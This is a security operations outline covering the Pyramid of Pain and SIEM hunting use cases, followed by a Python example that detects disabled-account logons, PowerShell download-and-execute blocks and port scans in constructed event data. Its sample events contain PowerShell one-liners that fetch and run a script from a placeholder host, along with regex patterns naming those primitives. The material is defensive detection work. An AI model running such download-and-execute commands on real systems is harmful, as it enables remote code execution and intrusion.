Threat Intelligence
Vulnerability Management
Incident Response
Continuous Monitoring
Pyramid of Pain (indicator types, listed from the hardest for the adversary to change down to the easiest):
TTPs
Tools
Network/Host Artifacts
Domains
IP Addresses
Hash Values
• Source: http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
• Written by David J Bianco
USE CASE: Windows EventID
USE CASE: Scanning
USE CASE: Log into disabled accounts
USE CASE: C2/Configuration Changes
USE CASE: PowerShell download and execution
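Three of the use cases above (scanning, logons to disabled accounts, PowerShell download and execution) reduce to simple filters and aggregations over event records. The block below is an added example written for this page; it is not code from the deck or from the linked Splunk posts. It assumes Windows Security event 4625 (failed logon) with SubStatus 0xC0000072 marks a disabled-account attempt, event 4104 carries PowerShell script block text, and a scan shows up as one source touching many distinct ports on one destination. All event records and connection tuples are constructed inline; the field names mirror the Windows Security log but are an assumption about how your SIEM normalises them.

```python
"""Toy hunting logic for three use cases: scanning, logons to disabled
accounts, and PowerShell download-and-execute. Sample input is constructed
here (not real telemetry); in practice the records come out of the SIEM."""
import re
from collections import defaultdict

# Constructed Windows Security events (assumed field names, not from the deck).
SAMPLE_EVENTS = [
    # 4625 with SubStatus 0xC0000072 == "account currently disabled"
    {"EventCode": 4625, "TargetUserName": "svc_backup", "Status": "0xC000006D",
     "SubStatus": "0xC0000072", "IpAddress": "10.0.0.5"},
    # 4625 with SubStatus 0xC000006A == wrong password, NOT a disabled account
    {"EventCode": 4625, "TargetUserName": "alice", "Status": "0xC000006D",
     "SubStatus": "0xC000006A", "IpAddress": "10.0.0.9"},
    {"EventCode": 4624, "TargetUserName": "bob", "IpAddress": "10.0.0.9"},
    # 4104 script block logging: download + execute in one block
    {"EventCode": 4104, "Computer": "ws01",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    # benign 4104 block
    {"EventCode": 4104, "Computer": "ws02",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"EventCode": 4104, "Computer": "ws03",
     "ScriptBlockText": "Invoke-Expression (Invoke-WebRequest -Uri 'http://example.invalid/b').Content"},
]

# Constructed (src, dst, dst_port) tuples, e.g. from firewall or NetFlow data.
SAMPLE_CONNS = [("10.0.0.7", "10.0.1.20", p) for p in range(1, 60)] + [
    ("10.0.0.8", "10.0.1.20", 443),
    ("10.0.0.8", "10.0.1.21", 443),
]

DISABLED_ACCOUNT_SUBSTATUS = "0xc0000072"  # compared case-insensitively


def disabled_account_logons(events):
    """Return (user, source ip) for failed logons against disabled accounts.
    Rough SPL analogue: EventCode=4625 Sub_Status=0xC0000072 | stats count by
    Account_Name Source_Network_Address (field names vary by add-on)."""
    return [
        (e["TargetUserName"], e.get("IpAddress", ""))
        for e in events
        if e.get("EventCode") == 4625
        and e.get("SubStatus", "").lower() == DISABLED_ACCOUNT_SUBSTATUS
    ]


# Fetch-from-network cmdlets/APIs and execute-string primitives. Obfuscated
# scripts (base64 -EncodedCommand, string concatenation) will evade these
# patterns; decode 4104 blocks before matching in a real deployment.
DOWNLOAD_PATTERNS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
EXEC_PATTERNS = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)


def powershell_download_exec(events):
    """Return (computer, script block) for 4104 blocks that both fetch remote
    content and execute it."""
    hits = []
    for e in events:
        if e.get("EventCode") != 4104:
            continue
        text = e.get("ScriptBlockText", "")
        if DOWNLOAD_PATTERNS.search(text) and EXEC_PATTERNS.search(text):
            hits.append((e.get("Computer", ""), text))
    return hits


def scanning_sources(conns, min_distinct_ports=25):
    """Return sources that touched at least min_distinct_ports distinct ports on
    a single destination. Threshold is a tuning assumption; vulnerability
    scanners and monitoring hosts need an allowlist."""
    seen = defaultdict(set)
    for src, dst, port in conns:
        seen[(src, dst)].add(port)
    return sorted({src for (src, _dst), ports in seen.items() if len(ports) >= min_distinct_ports})


if __name__ == "__main__":
    print("disabled-account logons:", disabled_account_logons(SAMPLE_EVENTS))
    print("download+exec hosts:", [h[0] for h in powershell_download_exec(SAMPLE_EVENTS)])
    print("scanning sources:", scanning_sources(SAMPLE_CONNS))
```

The disabled-account filter keys on SubStatus rather than the generic Status 0xC000006D, because the latter also covers plain bad-password failures; the PowerShell check requires both a download primitive and an execution primitive in the same block to keep noise from ordinary web requests down.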
• https://www.splunk.com/blog/2017/08/07/peeping-through-windows-logs.html
• https://www.splunk.com/blog/2017/07/06/hunting-with-splunk-the-basics.html
• https://www.splunk.com/blog/2017/11/03/you-can-t-hyde-from-dr-levenshtein-when-you-use-url-toolbox.html
• https://www.secureworks.com/research/sakula-malware-family
• https://www.splunk.com/blog/2018/03/20/hunting-your-dns-dragons.html